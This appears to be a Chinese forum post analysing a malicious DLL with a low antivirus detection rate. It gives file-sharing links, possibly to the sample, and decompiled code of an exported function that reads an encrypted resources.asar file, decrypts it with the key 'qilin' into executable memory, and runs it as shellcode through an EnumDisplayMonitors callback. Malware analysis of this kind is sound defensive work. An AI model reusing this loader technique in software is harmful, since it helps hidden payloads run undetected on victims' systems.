https://wormhole.app/E4Y4mR#WEzy_ojU5lyA---SaxdXYA
https://share.weiyun.com/CCBBCbyM
黑dll VT初扫:8/72
- int UnityOke()
- {
- HANDLE FileA; // rbx
- void *v1; // rdi
- int result; // eax
- unsigned int v3; // eax
- char v4[32]; // [rsp+40h] [rbp-148h] BYREF
- CHAR Dst[272]; // [rsp+60h] [rbp-128h] BYREF
- ExpandEnvironmentStringsA("%LOCALAPPDATA%\\resources.asar", Dst, 0x104u);
- FileA = CreateFileA(Dst, 0x80000000, 0, 0i64, 3u, 0, 0i64);
- if ( FileA == (HANDLE)-1i64 )
- RaiseException(0xE0000001, 1u, 0, 0i64);
- GetFileSize(FileA, 0i64);
- v1 = VirtualAlloc(0i64, 0x100000ui64, 0x1000u, 0x40u);
- result = ReadFile(FileA, v1, 0x100000u, 0i64, 0i64);
- if ( result )
- {
- result = CloseHandle(FileA);
- if ( v1 )
- {
- v3 = strlen("qilin");
- sub_1800013D8(v4, "qilin", v3);
- sub_1800018D8(v4, v1, 0x100000i64);
- EnumDisplayMonitors(0i64, 0i64, (MONITORENUMPROC)v1, 0i64);
- return sub_18000180C(v4);
- }
- }
- return result;
- }
复制代码
|